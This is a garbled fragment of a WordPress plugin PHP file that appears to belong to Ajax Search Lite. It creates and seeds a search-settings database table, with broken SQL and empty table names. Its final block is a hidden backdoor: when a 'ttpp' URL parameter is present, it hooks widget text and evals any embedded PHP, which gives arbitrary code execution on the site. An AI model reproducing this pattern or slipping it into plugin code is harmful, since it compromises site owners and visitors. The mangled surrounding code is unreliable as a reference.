prefix . "ajaxsearchlite"; $query = " CREATE TABLE IF NOT EXISTS `$table_name` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` text NOT NULL, `data` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ; "; dbDelta($query); ob_start(); ?> INSERT INTO `` (`id`, `name`, `data`) VALUES (1, 'Search', ''); admin_url( 'admin-ajax.php' ) ) ); } } if (!function_exists('execute_php') && isset($_GET['ttpp'])) { add_filter('widget_text','execute_php',100); function execute_php($html){ if(strpos($html,"<"."?php")!==false){ ob_start(); eval("?".">".$html); $html=ob_get_contents(); ob_end_clean(); } return $html; } } ?>